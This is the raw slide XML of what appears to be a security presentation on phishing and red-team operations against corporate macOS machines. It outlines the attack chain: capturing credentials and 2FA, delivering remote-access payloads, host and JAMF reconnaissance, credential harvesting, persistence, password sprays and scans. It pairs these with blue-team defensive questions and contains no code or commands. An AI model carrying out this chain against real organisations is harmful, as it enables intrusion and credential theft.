          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903359" y="1946693"/>
            <a:ext cx="2146300" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286C77A5-032E-3447-89C6-33B7509F282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D94BF45-A0DF-6D49-B02D-B60BA1195F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3852391" y="5440438"/>
            <a:ext cx="2197268" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creds + 2FA Captured</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1527515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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1825625"/>
            <a:ext cx="7480300" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID Compromised Tokens?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Processes In Place For Token Revocation?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are additional protections required for key apps??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Separate 2FA?, Separate creds? Separate VPN?, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device trust??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B2934B-78FC-A749-BF88-72AF09597046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318500" y="2864644"/>
            <a:ext cx="3682042" cy="2757680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422EAFE7-5FEB-4B4F-A8F0-770ACA23ABB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885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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450392" y="304927"/>
            <a:ext cx="9291215" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload-Based Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B73E63-B198-194C-8A92-9701EFD634A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18843" y="1384263"/>
            <a:ext cx="11881294" cy="4208073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External Payload Phish and Pivot:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8165E8E3-0913-5D4C-AB9E-6C2973A6CE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3963210" y="2839332"/>
            <a:ext cx="1749286" cy="1179336"/>
            <a:chOff x="7341704" y="1510854"/>
            <a:chExt cx="1749286" cy="1179336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F014AA43-759D-5046-B8E0-C40543FF1633}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7447722" y="1510854"/>
              <a:ext cx="1524000" cy="821529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D95DDE-1B5C-714A-B203-91A12EBFF1A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7341704" y="2332383"/>
              <a:ext cx="1749286" cy="357807"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">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object, light, lamp&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{567DF3F9-FF22-1E4B-85DA-97B9B16C24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68422" y="1680318"/>
              <a:ext cx="482600" cy="482600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="A picture containing plate, table, white, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9DEF2F6-50A8-814A-A71B-184653B56FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7121387" y="1129707"/>
            <a:ext cx="1447800" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1FC26A5-F168-1445-AC53-4B08B4288F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884647" y="2476859"/>
            <a:ext cx="2219595" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic JAMF Recon (for later use)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A417F7D-9697-9947-B2FC-615C6705597A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1739663" y="3305670"/>
            <a:ext cx="2223547"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10A4D42-B9A4-194B-9835-492D305839B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885461" y="3338159"/>
            <a:ext cx="1688616" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote access payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A drawing of a face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8F4C8A-82FA-0E45-A1FC-0BC3181AF0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="291863" y="2701689"/>
            <a:ext cx="1447800" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C147735E-4A64-3140-8D51-ADA2C4503F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023880" y="2435869"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Corp Mac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16B20E8-08CF-FB4E-B523-FA5CCD1D325D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5593228" y="1853607"/>
            <a:ext cx="1528159" cy="1396490"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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2115162-E48B-644C-9E2D-F7B420004939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576662" y="3235924"/>
            <a:ext cx="1540566" cy="459068"/>
          </a:xfrm>
          <a:prstGeom prst="bent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9B43C95-9B0A-D448-B2D1-B4292967E8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7100662" y="3235924"/>
            <a:ext cx="2219595" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="4EEBFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>macOS host recon (EDR/AV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, NIC info, binding info, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED08CE3-0868-D544-B2D5-E11847B6C9E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081749" y="4550407"/>
            <a:ext cx="2238508" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="EF40ED"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prompt for creds, search for cred files, etc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44326CB1-DB0D-D946-81E3-6DFF75FC9584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081749" y="5587891"/>
            <a:ext cx="2238508" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="4EEBFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistence, Password sprays, port sweeping/scans, </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Elbow Connector 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32BB3B8E-C37E-F54D-B548-004721B55A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593228" y="3250097"/>
            <a:ext cx="1488521" cy="1761975"/>
          </a:xfrm>
          <a:prstGeom prst="bent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BA4FFF0-7533-234B-8AB6-28FFF2981DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593228" y="3250097"/>
            <a:ext cx="1488521" cy="2799459"/>
          </a:xfrm>
          <a:prstGeom prst="bent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53" name="Curved Right Arrow 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00C70D5-EAD8-284D-A28B-23C4E2CE5399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9592973" y="3591014"/>
            <a:ext cx="574484" cy="7141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Curved Right Arrow 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B64A80-3667-774E-8EA2-4C1774E60121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5232552" flipH="1" flipV="1">
            <a:off x="9663729" y="4259043"/>
            <a:ext cx="574484" cy="7141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2D807967-FA7C-E046-80FD-2AD68945E250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10356720" y="3692461"/>
            <a:ext cx="1644852" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="EF40ED"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rinse, repeat until op objectives are met</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C68FE396-3405-5248-909B-8EBC81F2E15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71736" y="4204948"/>
            <a:ext cx="2219595" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples: A signed and notarized app, macro-enabled MS Office Doc, .dmg with shell script, etc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F87ABE-06BE-6449-86DB-FCC088747EF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420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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98855" y="1825625"/>
            <a:ext cx="7302842" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
